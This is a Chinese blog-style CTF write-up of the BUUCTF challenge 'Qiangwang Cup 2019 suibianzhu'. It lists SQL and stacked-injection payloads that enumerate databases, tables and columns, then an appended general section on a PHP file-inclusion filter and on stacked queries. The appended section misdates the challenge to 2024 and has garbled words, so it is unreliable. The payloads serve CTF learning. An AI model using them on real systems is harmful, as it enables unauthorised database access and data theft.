【BUUCTF】web之强网杯2019随便注

开始注入:
1’ : 报错
1’ #:回显正常
1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜)
1’ union select 1,2#: 回显 如图不管怎样就喜欢有挑战性的,傲娇
看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入:
库:1’;show databases;#
得到数据库数据库
表:1’;show tables;#
得到俩个表表
列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 `` 注:在网上百度发现
得到 一个带有flag的字段 和 另一个 可查询的表
flag表:在这里插入图片描述可查询表:

### 关于BUUCTF Web类题目执行的方法 #### 文件包含漏洞利用 在处理文件包含漏洞时,了解服务器端如何解析并加载指定文件至关重要。对于给定的PHP代码片段[^3]: ```php <?php highlight_file(__FILE__); error_reporting(0); $file = $_GET['file']; if (strstr($file, "../") || stristr($file, "tp") || stristr($file, "input") || stristr($file, "data")) { echo "Oh no!"; exit(); } include($file); ?> ``` 这段代码展示了对`$_GET['file']`参数进行了过滤,防止访问特定路径下的文件以及含有敏感字符(如"../", "tp", "input", 和"data")的文件。 然而,攻击者可以尝试绕过这些限制来读取其他文件的内容。例如,如果目标是在同一目录下查找名为`flag.php`的文件,则可以通过构造合适的请求实现这一点。假设存在一个未被阻止的关键字或路径组合,那么就可以成功触发文件包含操作。 #### SQL入与堆叠查询 SQL入是一种常见的Web安全漏洞,允许恶意用户通过输入特殊构造的数据操纵后台数据库的行为。当提到MySQL中的默认结束符`;`用于分隔多个命令时,这表明可能存在所谓的“堆叠入”,即在同一查询字符串内附加额外的有效负载以执行更多指令[^2]。 例如,在某些情况下,如果应用程序未能正确清理用户的输入,并且允许提交带有分号(`;`)和其他合法SQL语法结构的数据,就有可能造成意外的结果集返回甚至修改数据表内的记录。 为了防范此类风险,开发者应当始终遵循最佳实践原则——采用预编译语句、绑定变量等方式替代直接拼接字符串作为最终发送到DBMS上的查询文本;同时还要意设置适当的安全策略控制哪些类型的HTTP请求能够到达相应的API接口层面上去。 #### 实际案例分析 针对具体实例而言,比如强网2024比赛中遇到的一道叫做《随便》的CTF挑战题,其核心在于识别出可利用之处并通过精心设计payload达成预期目的。这类竞赛往往鼓励参赛选手深入研究官方文档和技术资料,从中挖掘潜在弱点所在。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值